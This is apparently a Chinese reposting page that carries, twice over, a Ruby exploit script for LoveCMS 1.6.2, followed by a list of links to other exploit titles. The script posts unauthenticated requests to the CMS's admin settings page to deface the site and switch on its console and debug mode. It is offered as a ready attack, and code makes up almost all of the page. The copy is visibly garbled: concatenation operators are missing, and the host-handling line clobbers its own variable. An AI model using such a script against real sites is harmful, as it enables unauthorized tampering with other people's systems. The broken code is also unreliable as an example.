佚名 向大家分享了LoveCMS 1.6.2 Final Update Settings Remote Exploit ,其中包含exploit,exploit是什么意思,exploit db,exploit开拓官网,exploit开拓工具等知识点,遇到此问题的同学们可以参考下
#!/usr/bin/ruby
#
## Exploit by PoMdaPiMp!
## ---------------------
## pomdapimp(at)gmail(dotcom)
##
## LoveCMS Exploit Series
## Episode 3: changing site settings ...
##
## Description: Simply change the site settings !
##
## Usage: ./LoveCMS_3_settings.rb <host>
## Ex: ./LoveCMS_2_themes.rb http://site.com/lovecms/
##
## Tested on: lovecms_1.6.2_final (MacOS X, Xampp)
#
require 'net/http'
require 'uri'
@host = 'http://127.0.0.1/lovecms_1.6.2_final/lovecms/'
@post_vars = {}
@post_vars['submit'] = 1
@post_vars['pagetitle'] = 'P4g3T1t1le'
@post_vars['sitename'] = 'SiteN4me'
@post_vars['slogan'] = 'By PoMdaPiMp.'
@post_vars['footer'] = 'PoMdaPiMp was here.'
@post_vars['description'] = 'Ruby is a gift.'
@post_vars['keywords'] = 'PoMdaPiMp, hack'
@post_vars['encoding'] = 'utf-8'
@post_vars['tips'] = 'off'
@post_vars['console'] = 'on'
@post_vars['debugmode'] = 'on'
@post_vars['module'] = 2
@post_vars['love_root'] = ''
@post_vars['love_url'] = ''
@host = ARGV[0] if ARGV[0]
@host = @host[-1, 1].to_s != '/' ? '/' : ''
if @host
# --
puts " LoveCMS Exploit Series. #3: Messing with settings."
puts
puts " : Attacking host: " @host
# --
# Changing settings
res = Net::HTTP.post_form(URI.parse(@host 'system/admin/themes.php'),
@post_vars)
puts " :: Values set."
@post_vars.each do |k, v|
puts " " k.to_s " > " v.to_s
end
# --
puts
puts " - Visit " @host
end
</div>
#
## Exploit by PoMdaPiMp!
## ---------------------
## pomdapimp(at)gmail(dotcom)
##
## LoveCMS Exploit Series
## Episode 3: changing site settings ...
##
## Description: Simply change the site settings !
##
## Usage: ./LoveCMS_3_settings.rb <host>
## Ex: ./LoveCMS_2_themes.rb http://site.com/lovecms/
##
## Tested on: lovecms_1.6.2_final (MacOS X, Xampp)
#
require 'net/http'
require 'uri'
@host = 'http://127.0.0.1/lovecms_1.6.2_final/lovecms/'
@post_vars = {}
@post_vars['submit'] = 1
@post_vars['pagetitle'] = 'P4g3T1t1le'
@post_vars['sitename'] = 'SiteN4me'
@post_vars['slogan'] = 'By PoMdaPiMp.'
@post_vars['footer'] = 'PoMdaPiMp was here.'
@post_vars['description'] = 'Ruby is a gift.'
@post_vars['keywords'] = 'PoMdaPiMp, hack'
@post_vars['encoding'] = 'utf-8'
@post_vars['tips'] = 'off'
@post_vars['console'] = 'on'
@post_vars['debugmode'] = 'on'
@post_vars['module'] = 2
@post_vars['love_root'] = ''
@post_vars['love_url'] = ''
@host = ARGV[0] if ARGV[0]
@host = @host[-1, 1].to_s != '/' ? '/' : ''
if @host
# --
puts " LoveCMS Exploit Series. #3: Messing with settings."
puts
puts " : Attacking host: " @host
# --
# Changing settings
res = Net::HTTP.post_form(URI.parse(@host 'system/admin/themes.php'),
@post_vars)
puts " :: Values set."
@post_vars.each do |k, v|
puts " " k.to_s " > " v.to_s
end
# --
puts
puts " - Visit " @host
end
</div>
您可能想查找下面的文章:
- Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit
- IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit
- IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit
- MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit
- Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit
- Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit
- Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit
- Cisco IOS 12.3(18) FTP Server Remote Exploit (attached to gdb)
- NCTsoft AudFile.dll ActiveX Control Remote Buffer Overflow Exploit
- WinRemotePC Full Lite 2008 r.2server Denial of Service Exploit

